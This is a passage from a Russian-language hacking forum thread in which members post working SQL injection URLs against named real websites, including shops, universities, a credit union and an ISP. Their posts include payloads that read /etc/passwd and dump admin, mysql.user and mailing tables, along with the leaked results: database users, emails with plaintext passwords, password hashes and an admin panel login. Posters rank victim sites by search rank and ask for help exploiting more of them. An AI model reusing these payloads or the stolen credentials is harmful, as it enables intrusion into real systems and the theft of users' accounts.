SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 0xA1isa

    0xA1isa Member

    Joined:
    19 Jun 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    5
    http://www.jurnal.org/articles.php?rub=ekon'+union+select+1,2,version(),user(),5,6+limit+160,100/*



    http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,login,passwd),3,4,user(),6,7,8+from+users+limit+0,1/*

    http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,username,passwd),3,4,user(),6,7,8+from+adm+limit+0,1/*

    tm mw3p2dfv
     
    2 people like this.
  2. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9--
    http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9+from+information_schema.tables--
    http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x3132616c6c5f61646d696e--
     
  3. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Пробежались по магазинам!

    http://mediacomp.ru/?action=sub_kat&top_kat=-2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)/*

    Database Version: 4.1.18-standard
    Database name: db_mediacomp
    User name: mediacomp@localhost


    http://www.stereophones.ru/comments.php?id=123+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5--&model_name=Yamaha%20RH5MA


    version:5.0.67-log
    user:[email protected]
    database:u45585


    Getting Data from table mail (493 Rows) from database u45585
    Fields email:status:id:pass

    [1]:[email protected]:0:5:9kSA4wHn
    [2]:[email protected]:0:15:4FfNS]D?M
    [3]:[email protected]:1:6:Y3dD]oUq
    [4]:[email protected]:1:7:i?uNNF;Yb
    [5]:[email protected]:1:8:h_`_6Q1T
    [6]:[email protected]:1:9:p7?5CFUPa
    [7]:[email protected]:0:10:ZmQtGW
    [8]:[email protected]:1:11:yCdW_>];
    [9]:[email protected]:1:12:are2@k
    [10]:[email protected]:1:13:C7t^pBm
    [11]:[email protected]:1:14:Y1^fq5g7g
    [12]:[email protected]:1:16:vUJBWZa_l
     
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    State.hi.us - пр 7
    xyz разкрутиш )
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://elftor.com/elftor.php?number=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Code:
    http://www.frutonyanya.ru/php/news.php?n=25&c=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    хз, подобрал точно, но ничего не выводится о_О
     
    _________________________
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Всё там выводится:

    Db Version: 4.1.22-log
    Db name: frutony3_fn
    UserName: frutony3_fn@localhost
     
  7. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    PHP:
    http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20version(),user(),database()),3,4--
    5.0.67-community - tsl_admin@localhost - tsl_admin

    ТИЦ:30
    PR:5

    ======

    PHP:
    http://www.mmdb.ru/index.php?action=perf_by_genre&id_genre=-1033+union+select+1,version()/*
    Version: 4.1.22-log
    database: wwwmmdbusersru
    user: mmdb@localhost


    ТИЦ:40
    PR: 5

    ======

    PHP:
    http://www.parisbeaute.ua/articles/article.phtml?id=-7'+union+select+concat_ws(char(32,45,32),%20version(),user(),database()),2,3,4/*
    4.1.22 - u_parisbeaut@localhost - parisbeaute

    ТИЦ: 30
    PR: 2
    ======
     
    1 person likes this.
  8. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.belexpo.by/ru/news/2008/12/11/125.html?template=20+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5--

    Database Version: 4.1.16-max
    Database name: belexpo
    User name: belexpo@localhost


    http://www.lekar.by/press/articles/23.html?template=20+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),table_name,5+from+information_schema.tables+limit+40,100--

    5.0.67-community
    lekarby_cms@localhost
    lekarby_cms
    name не смог вытянуть может подскажете как
    email [email protected]
    password 4722c00d0d47009e пароль : 1976
     
  9. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Кредитная организация.

    www.iccreditunion.org

    4.1.22-standard
    iccredit_icdb
    iccredit_ensky@localhost
     
    2 people like this.
  10. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    http://www.thisspartanlife.com/admin/

    Adminname: Damian
    Password: admin
     
    1 person likes this.
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.footballfoundation.com/news.php?id=-939+union+select+convert(concat_ws(0x3a,user,password)%20using%20latin1),2,3,4,5,6,7+from+mysql.user--
    логин/пасс:
    Code:
    root:1ca8d68529746826
    Это скуля была на 5какой то странице,но она была не раскручена, так что не сочтите за баян...
    ------------------------------------------------------
    Code:
    http://www.artmalik.com/gallery/gallery.php?id=9999999+union+select+concat_ws(0x3a,login,pass),2+from+admin--
    логин/пасс:
    Code:
    ahmedrbg:lveLCEiw 
    ------------------------------------------------------
    The end!
     
    1 person likes this.
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    "Эксклюзивные номера всех мобильных операторов Украины"


    Code:
    http://businessnumbers.com.ua/auction.php?act=viewone&id=-1+union+select+1,2,3,4,5,6,7--
    5-ая ветка.

    [0]:guest:p9[ic69fb50877346705c3b6d792b6148757
    [1]:admin:Cg6Q4e86442ca656f1ab932a5dbb5bf6ff22
     
  13. jjokker

    jjokker Member

    Joined:
    19 Apr 2008
    Messages:
    7
    Likes Received:
    18
    Reputations:
    0
    http://www.uni-hannover.de (тИЦ: 950, pr: 7 )

    http://www.uni-hannover.de/en/aktuell/online-aktuell/index.php?rubrik=8%20union%20select%20database(),2,3,4,5,6,7,8%20from%20User+--+
     
    1 person likes this.
  14. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3

    З.Ы
    westside, там нет скули...
     
  15. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    angara-telecom.ru - интернет-провайдер :)
    Version 5.0.41
    User angara-telecom@localhost
    Database site_angara-telecom_ru

    Правда особо интересного ничего там не найти (


    www.serieslive.com - буржуйская социальная сеть на переделанном WP, как я понял..
    Version 5.0.44-log
    User root@localhost
    Database serieslive4

    sega.com - сайт компании SEGA :)
    Но раскрутить не знаю как :( буду благодарен если кто подскажет..
     
    #7095 Thrasher88, 22 Dec 2008
    Last edited: 22 Dec 2008
    1 person likes this.
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.mcaleesemarine.com/boat-spec.php?id=0306076+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60/*
    блинд..
     
    _________________________
  17. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    херасе блинд! очень даже зоркая, я бы сказал:
    http://www.mcaleesemarine.com/boat-spec.php?id=-0306076+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60/*
     
    1 person likes this.
  18. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://aofco.com/new/more.php?productID=1+union+select+1,2,concat(version(),char(58),user(),char(58),database())

    5.0.67-community-log:audiobox_garrett@localhost:audiobox_aof
     
  19. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Ловим эдушики =)

    http://review.antioch.edu/detail.php?id=815+union+select+1,2,version(),4,5,6,7/*

    http://french.berkeley.edu/news/news_events_ind.php?id=-53+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

    http://www.gsd.umn.edu/article.php?id=-189+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

    +
    PR 6
    http://www.northwestu.edu/news/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--
    5.0.45-community-nt

    +
    PR4
    http://www.ambassadors.edu/About/news.php?id=-63+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--
    5.0.67-log

    +
    PR5
    http://vl2.gallaudet.edu/news.php?id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
    5.0.51a-community-nt
     
    #7099 hackmen, 23 Dec 2008
    Last edited: 23 Dec 2008
  20. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    konsultant.ru - страховая компания
    5.0.67-log::[email protected]::u96341
     
Thread Status:
Not open for further replies.